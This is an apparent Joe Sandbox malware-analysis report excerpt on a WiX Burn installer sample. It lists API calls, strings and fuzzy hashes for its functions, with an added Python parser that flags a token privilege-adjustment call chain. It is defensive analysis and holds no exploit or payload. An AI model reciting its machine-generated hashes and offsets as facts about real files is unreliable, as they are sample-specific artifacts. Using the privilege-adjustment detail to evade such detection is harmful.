                                                                                                                                                                  • Instruction ID: f0b507844e66b6b387d21b08e9de9f5251188e3c16aaf9d387661083ca2ba0bb
                                                                                                                                                                  • Opcode Fuzzy Hash: bcf4de08e5bdb93a7ff81f9ac8f0f522a46e695169b8f98e84b057e1d6da7612
                                                                                                                                                                  • Instruction Fuzzy Hash: BB710972E80239B7DB21AA549C46FEE7BB8AF04B14F110515FF14BA2D1E3B55D409790
                                                                                                                                                                  APIs
                                                                                                                                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,?,F0000040,?,?,?,?,?,?), ref: 0096A335
                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 0096A33F
                                                                                                                                                                  • CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?,?,?), ref: 0096A38D
                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 0096A397
                                                                                                                                                                  • CryptHashData.ADVAPI32(?,?,?,00000000,?,?), ref: 0096A3F2
                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00001000,?,00000000,?,?), ref: 0096A416
                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 0096A420
                                                                                                                                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 0096A473
                                                                                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0096A48A
                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 0096A4A3
                                                                                                                                                                  • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,?), ref: 0096A4EF
                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 0096A4F9
                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,00000000,00000000,0000800E,00000001,?,?), ref: 0096A543
                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 0096A551
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CryptErrorLast$Hash$ContextFile$AcquireCreateDataDestroyParamPointerReadRelease
                                                                                                                                                                  • String ID: Failed to acquire crypto context.$Failed to get file pointer.$Failed to get hash value.$Failed to hash data block.$Failed to initiate hash.$Failed to read data block.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\cryputil.cpp
                                                                                                                                                                  • API String ID: 3955742341-696376830
                                                                                                                                                                  • Opcode ID: 0990cb4430f4729cae7cfa48a487bcb33088b0db010ec4f6cccadc373580d53a
                                                                                                                                                                  • Instruction ID: 68f6c59818ad10a62f6b2c61563e1daec72350ce5e7d2442ca7375984e912360
                                                                                                                                                                  • Opcode Fuzzy Hash: 0990cb4430f4729cae7cfa48a487bcb33088b0db010ec4f6cccadc373580d53a
                                                                                                                                                                  • Instruction Fuzzy Hash: C7610C33E002397BD7318A548C49BEE76ACAF48755F0140A5BE49F72A1E7B48C809FE1
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindResourceExA.KERNEL32(?,0000000A,?,00000000), ref: 009769AD
                                                                                                                                                                  • GetLastError.KERNEL32(?,0093D16B,?,00000001,?,?), ref: 009769B9
                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000,?,0093D16B,?,00000001,?,?), ref: 00976A06
                                                                                                                                                                  • GetLastError.KERNEL32(?,0093D16B,?,00000001,?,?), ref: 00976A12
                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000,?,0093D16B,?,00000001,?,?), ref: 00976A4D
                                                                                                                                                                  • GetLastError.KERNEL32(?,0093D16B,?,00000001,?,?), ref: 00976A59
                                                                                                                                                                  • LockResource.KERNEL32(00000000,?,0093D16B,?,00000001,?,?), ref: 00976A94
                                                                                                                                                                  • GetLastError.KERNEL32(?,0093D16B,?,00000001,?,?), ref: 00976AA5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastResource$FindLoadLockSizeof
                                                                                                                                                                  • String ID: Failed to find resource.$Failed to get size of resource.$Failed to load resource.$Failed to lock data resource.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\resrutil.cpp
                                                                                                                                                                  • API String ID: 2627587518-3856033167
                                                                                                                                                                  • Opcode ID: cb4ed5ae37fbb9e9ed5cc72d5ff246338589fd92973bd98cd0f071bbac9d5e78
                                                                                                                                                                  • Instruction ID: f4f1dd3b070aa0cada54f0ebeaec0766ce9b0f4ace931f2d67bbd59d24380edc
                                                                                                                                                                  • Opcode Fuzzy Hash: cb4ed5ae37fbb9e9ed5cc72d5ff246338589fd92973bd98cd0f071bbac9d5e78
                                                                                                                                                                  • Instruction Fuzzy Hash: 5D312577A51A3A77D3214A548C49F6B6D6CEB89B60F06C029FE1DFB391E634CC0096E1
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to reset permissions on unverified cached payload: %ls, xrefs: 0092EBBC
                                                                                                                                                                  • moving, xrefs: 0092EC25, 0092EC32
                                                                                                                                                                  • Failed to get cached path for package with cache id: %ls, xrefs: 0092EA7F
                                                                                                                                                                  • Failed to verify payload: %ls at path: %ls, xrefs: 0092EC0A
                                                                                                                                                                  • Failed to create unverified path., xrefs: 0092EAD8
                                                                                                                                                                  • Aborted transferring working path to unverified path for payload: %ls., xrefs: 0092EB92
                                                                                                                                                                  • Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 0092ECA9
                                                                                                                                                                  • Failed to transfer working path to unverified path for payload: %ls., xrefs: 0092EB31
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\cache.cpp, xrefs: 0092EA91, 0092EAEA, 0092EC97, 0092ECBB
                                                                                                                                                                  • copying, xrefs: 0092EC2C
                                                                                                                                                                  • Failed to move verified file to complete payload path: %ls, xrefs: 0092EC6A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Aborted transferring working path to unverified path for payload: %ls.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$Failed to verify payload: %ls at path: %ls$copying$d:\a\wix4\wix4\src\burn\engine\cache.cpp$moving
                                                                                                                                                                  • API String ID: 0-1123430254
                                                                                                                                                                  • Opcode ID: 5f3611104e9fd5b30349c9053bf48db534351cf02b690febe4e3a677489dface
                                                                                                                                                                  • Instruction ID: dce725eb87e978a1e1137fef75206b689dd3750eb4b3db793e42b8129e871fd8
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f3611104e9fd5b30349c9053bf48db534351cf02b690febe4e3a677489dface
• Instruction Fuzzy Hash: 8F717432680229BBEF23AE90DC46FDE7E25BF58B54F150100FB44791E1D7B2D960AB94
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0096B8BC
• GetLastError.KERNEL32 ref: 0096B8C6
• OpenProcessToken.ADVAPI32(?,00000020,?), ref: 0096B91A
• GetLastError.KERNEL32 ref: 0096B924
• AdjustTokenPrivileges.ADVAPI32(00000000,00000000,00000001,00000010,00000000,00000000), ref: 0096B976
• GetLastError.KERNEL32 ref: 0096B980
• GetLastError.KERNEL32 ref: 0096B9C4
• CloseHandle.KERNEL32(00000000), ref: 0096B9DD
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: ErrorLast$Token$AdjustCloseHandleLookupOpenPrivilegePrivilegesProcessValue
• String ID: Failed to adjust token to add privilege: %ls$Failed to get privilege LUID: %ls$Failed to get process token to adjust privileges.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp
• API String ID: 1766547789-2883319381
• Opcode ID: be161ca2d7868b003687f5d78adb511a5b9f880aacb02f24b504d602bd5123d1
• Instruction ID: 37b8cb028486c8049c7a0ca3020caddadb80d73f7ace3d1c71c89e4254ca1029
• Opcode Fuzzy Hash: be161ca2d7868b003687f5d78adb511a5b9f880aacb02f24b504d602bd5123d1
• Instruction Fuzzy Hash: 9C419172E5123977E7209B558C4AFBF7AACEF49B58F010515BE04FB290E3748D809AE0
APIs
• CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 0092DBAC
• GetLastError.KERNEL32 ref: 0092DBBF
• DecryptFileW.ADVAPI32(?,00000000), ref: 0092DD92
• CloseHandle.KERNEL32(?), ref: 0092DDA1
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: File$CloseCreateDecryptErrorHandleLast
• String ID: Failed to open payload at path: %ls$Failed to verify file size for path: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$Payload has no verification information: %ls$d:\a\wix4\wix4\src\burn\engine\cache.cpp
• API String ID: 3262865546-780857860
• Opcode ID: 63bb263bbe1d19093c62ac12d282ae71ee816c15a547843cfda9fab2600c448f
• Instruction ID: cf3718beff216e9ac64dc3314dad2413091337b1f123b7226323aacb3d425d08
• Opcode Fuzzy Hash: 63bb263bbe1d19093c62ac12d282ae71ee816c15a547843cfda9fab2600c448f
• Instruction Fuzzy Hash: E2514A32681B36BBEB225E64AC0AFAB3A2DFF44710F140604FA05755D0D3A59C60DBE0
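The two "APIs" lists above (the token-privilege record ending at 0096B9DD and the payload-open record ending at 0092DDA1) print resolved arguments as raw hex and unresolved ones as "?". The following is an added example, not part of the Joe Sandbox report or of the sample: a small Python parser for that list format that decodes the constants the sandbox resolved (TOKEN_ADJUST_PRIVILEGES for OpenProcessToken, GENERIC_READ / FILE_SHARE_READ|FILE_SHARE_DELETE / OPEN_EXISTING / FILE_FLAG_SEQUENTIAL_SCAN for CreateFileW) and flags the LookupPrivilegeValueW, then OpenProcessToken, then AdjustTokenPrivileges sequence that enables a privilege on a process token. The sample lines are copied from the two records above; the flag tables are standard Win32 values; the sequence check and the "single privilege" check (BufferLength 0x10 equals sizeof(TOKEN_PRIVILEGES) with one LUID_AND_ATTRIBUTES) are this example's own heuristics. One caveat the strings in these records supply themselves: the source paths (wixtoolset.dutil\procutil.cpp, burn\engine\cache.cpp) belong to the WiX Burn bootstrapper engine, so this chain also appears in legitimate installers and is context for the report's other signatures, not a verdict on its own.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: API lines in the shape the Joe Sandbox "APIs" list prints them,
# copied from the two function records above. Nothing else about the sample is assumed.
PRIV_FUNC = """\
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0096B8BC
• GetLastError.KERNEL32 ref: 0096B8C6
• OpenProcessToken.ADVAPI32(?,00000020,?), ref: 0096B91A
• GetLastError.KERNEL32 ref: 0096B924
• AdjustTokenPrivileges.ADVAPI32(00000000,00000000,00000001,00000010,00000000,00000000), ref: 0096B976
• GetLastError.KERNEL32 ref: 0096B980
• CloseHandle.KERNEL32(00000000), ref: 0096B9DD
"""

CACHE_FUNC = """\
• CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 0092DBAC
• GetLastError.KERNEL32 ref: 0092DBBF
• DecryptFileW.ADVAPI32(?,00000000), ref: 0092DD92
• CloseHandle.KERNEL32(?), ref: 0092DDA1
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]  # None where the report printed '?'
    ref: int                   # address of the call site


_LINE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<mod>\w+)"        # API.MODULE
    r"(?:\((?P<args>[^)]*)\))?"               # optional (arg,arg,...)
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"  # ', ref: ADDR'
)


def parse_api_list(text: str) -> List[ApiCall]:
    """Parse one 'APIs' list; lines that do not match (e.g. subcall notes) are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if not m:
            continue
        raw = m.group("args")
        args: List[Optional[int]] = []
        if raw is not None and raw.strip():
            for a in raw.split(","):
                a = a.strip()
                args.append(None if a == "?" else int(a, 16))
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
    return calls


# Standard Win32 bit masks, keyed by (API, 0-based argument index).
FLAG_TABLES: Dict[tuple, Dict[int, str]] = {
    ("OpenProcessToken", 1): {
        0x0001: "TOKEN_ASSIGN_PRIMARY", 0x0002: "TOKEN_DUPLICATE", 0x0004: "TOKEN_IMPERSONATE",
        0x0008: "TOKEN_QUERY", 0x0010: "TOKEN_QUERY_SOURCE", 0x0020: "TOKEN_ADJUST_PRIVILEGES",
        0x0040: "TOKEN_ADJUST_GROUPS", 0x0080: "TOKEN_ADJUST_DEFAULT", 0x0100: "TOKEN_ADJUST_SESSIONID",
    },
    ("CreateFileW", 1): {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                         0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"},
    ("CreateFileW", 2): {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"},
    ("CreateFileW", 5): {
        0x00000080: "FILE_ATTRIBUTE_NORMAL", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
        0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN",
        0x10000000: "FILE_FLAG_RANDOM_ACCESS", 0x20000000: "FILE_FLAG_NO_BUFFERING",
        0x40000000: "FILE_FLAG_OVERLAPPED", 0x80000000: "FILE_FLAG_WRITE_THROUGH",
    },
}
# Exact-value enumerations (not bit sets).
ENUM_TABLES: Dict[tuple, Dict[int, str]] = {
    ("CreateFileW", 4): {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                         4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"},
}


def decode_mask(table: Dict[int, str], value: int) -> List[str]:
    """Names of the known bits set in value; any leftover bits are kept as hex."""
    names, rest = [], value
    for bit in sorted(table):
        if value & bit:
            names.append(table[bit])
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:08X}")
    return names


def describe(call: ApiCall) -> Dict[int, str]:
    """Symbolic names for the constant arguments the report managed to resolve."""
    out: Dict[int, str] = {}
    for i, v in enumerate(call.args):
        if v is None:
            continue
        if (call.api, i) in FLAG_TABLES:
            out[i] = "|".join(decode_mask(FLAG_TABLES[(call.api, i)], v)) or "0"
        elif (call.api, i) in ENUM_TABLES:
            out[i] = ENUM_TABLES[(call.api, i)].get(v, f"0x{v:08X}")
    return out


TOKEN_ADJUST_PRIVILEGES = 0x0020
SIZEOF_TOKEN_PRIVILEGES = 16  # DWORD PrivilegeCount + one LUID_AND_ATTRIBUTES (8 + 4 bytes)


def privilege_enable_chain(calls: List[ApiCall]) -> Optional[Dict[str, object]]:
    """Heuristic: Lookup -> OpenProcessToken -> AdjustTokenPrivileges, in order, in one function."""
    order = [c.api for c in calls]
    pos, start = [], 0
    for api in ("LookupPrivilegeValueW", "OpenProcessToken", "AdjustTokenPrivileges"):
        try:
            idx = order.index(api, start)
        except ValueError:
            return None
        pos.append(idx)
        start = idx + 1
    opt, adj = calls[pos[1]], calls[pos[2]]
    access = opt.args[1] if len(opt.args) > 1 else None
    buflen = adj.args[3] if len(adj.args) > 3 else None   # AdjustTokenPrivileges BufferLength
    return {
        "ref": adj.ref,
        "token_access": describe(opt).get(1),
        "adjust_priv_bit": None if access is None else bool(access & TOKEN_ADJUST_PRIVILEGES),
        "single_privilege": buflen == SIZEOF_TOKEN_PRIVILEGES,
    }


if __name__ == "__main__":
    print(privilege_enable_chain(parse_api_list(PRIV_FUNC)))
    for c in parse_api_list(CACHE_FUNC):
        if c.api == "CreateFileW":
            print(f"CreateFileW @ {c.ref:08X}:", describe(c))
```

The sandbox's static argument recovery is approximate, so unresolved positions stay None rather than being guessed, and the chain check reports the access-mask and buffer-length evidence separately instead of collapsing everything into one boolean.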
Strings
• Failed to set variant value., xrefs: 00919650
• Failed to get OS info., xrefs: 00919544
• d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 00919662
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: FreeLibrary
• String ID: Failed to get OS info.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
• API String ID: 3664257935-2618661516
• Opcode ID: 3806c2720460aa805944c26b2ac5ae5b6384adfd91f5b096ff0dc4f498c2f1a0
• Instruction ID: 56d7c102595205ec76589b926cb9ba2158c1221ec7891416d50600cc6e5f9ccd
• Opcode Fuzzy Hash: 3806c2720460aa805944c26b2ac5ae5b6384adfd91f5b096ff0dc4f498c2f1a0
• Instruction Fuzzy Hash: 2C41E471B0521CBBDB118B69CC5AFEE7AB8EB49744F400599F549EB180D274DAC0CBA0
APIs
• CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 0092DA2B
• GetLastError.KERNEL32 ref: 0092DA3E
• DecryptFileW.ADVAPI32(?,00000000), ref: 0092DB3F
• CloseHandle.KERNEL32(?,?,?,?,?,00000001,?,00000000,?,?,?,?), ref: 0092DB4E
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: File$CloseCreateDecryptErrorHandleLast
• String ID: Container has no verification information: %ls$Failed to open container at path: %ls$Failed to verify hash of container: %ls$d:\a\wix4\wix4\src\burn\engine\cache.cpp
• API String ID: 3262865546-1184176504
• Opcode ID: 00bb887e8094afe10ace4d48e1ea9e4187855bf5c94acf1d04ee54fca42d5ca6
• Instruction ID: bb5df6d035f67ac675859388842b5235100e5bdc5f78074597c51e6df0b743d5
• Opcode Fuzzy Hash: 00bb887e8094afe10ace4d48e1ea9e4187855bf5c94acf1d04ee54fca42d5ca6
• Instruction Fuzzy Hash: 01316032781335B7EB326A58AC5BF9E3618EF44714F110100FB157A1D0D3E49D60DAD1
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID:
• String ID: BA aborted cache acquire begin.$BA aborted cache acquire resolving.$Failed to compare '%ls' to '%ls'.$Failed to copy payload: %ls$Failed to determine if payload paths were equivalent, source: %ls, destination: %ls.$Failed to download payload: %ls$Failed to extract container for payload: %ls$Failed to resolve source, payload: %ls, package: %ls, container: %ls$Failed to search local source.$d:\a\wix4\wix4\src\burn\engine\apply.cpp
• API String ID: 0-1652660176
• Opcode ID: ced1bc192ac71ebf246fd3fb373c7c5a2932d08733ce3dd06b5e2444de8f859a
• Instruction ID: bc215a241c70d9c8a2bfa50ed5958f545b806694fe4469f641aa9b41d4225c0b
• Opcode Fuzzy Hash: ced1bc192ac71ebf246fd3fb373c7c5a2932d08733ce3dd06b5e2444de8f859a
• Instruction Fuzzy Hash: CF224671E0021AEFDF15CF98C981EAEBBB5BF88300F14416AE905AB251E771AD51DB90
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
• Opcode ID: ea6c862930b4a789fb449e1851e1434557b5f524105ecbd77b10328a16d4c665
• Instruction ID: 5405db24fb8d2ae5b23e2398bc81b626e8ea6e07c4006c9157fda540d2e97636
• Opcode Fuzzy Hash: ea6c862930b4a789fb449e1851e1434557b5f524105ecbd77b10328a16d4c665
• Instruction Fuzzy Hash: 17D25971E086298FDB65CE68DD407EAB7B9FB84305F1541EAD40DE3240EB78AE818F41
APIs
• FindFirstFileW.KERNEL32(?,?,?,?,*.*,?,?,?,.unverified,?), ref: 0092E7D8
• FindNextFileW.KERNEL32(00000000,00000010,?,?,*.*,?,?,?,.unverified,?), ref: 0092E871
• FindClose.KERNEL32(00000000,?,?,*.*,?,?,?,.unverified,?), ref: 0092E880
  • Part of subcall function 00915C81: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00000000,00000001), ref: 00915CE9
  • Part of subcall function 00915C81: GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 00915CF4
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: FileFind$AttributesCloseErrorFirstLastNext
• String ID: *.*$.unverified
• API String ID: 3458812364-2528915496
• Opcode ID: 335c8015416aef7527ec977c5ca458c521695ef6f3903761e6edb098257bdf0e
• Instruction ID: 70771ea1931d63d328e165bd16750c380050cfed1203bd970b6bacd72ba7cb6c
                                                                                                                                                                  • Opcode Fuzzy Hash: 335c8015416aef7527ec977c5ca458c521695ef6f3903761e6edb098257bdf0e
                                                                                                                                                                  • Instruction Fuzzy Hash: 5F41A071A0023CAADB20AB61EC89BEE77BCAF84715F0041A5F948E6195D7709EC4DF54
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastNameUser
                                                                                                                                                                  • String ID: Failed to get the user name.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 2054405381-561454448
                                                                                                                                                                  • Opcode ID: 38b9f512474633c5d49c2191ed4217f028e02100ac9c26db50f2cce02f3f8755
                                                                                                                                                                  • Instruction ID: 415de6cadb448a48d6ae903f155d097ae9865323c468736552160ebac4d84e8a
                                                                                                                                                                  • Opcode Fuzzy Hash: 38b9f512474633c5d49c2191ed4217f028e02100ac9c26db50f2cce02f3f8755
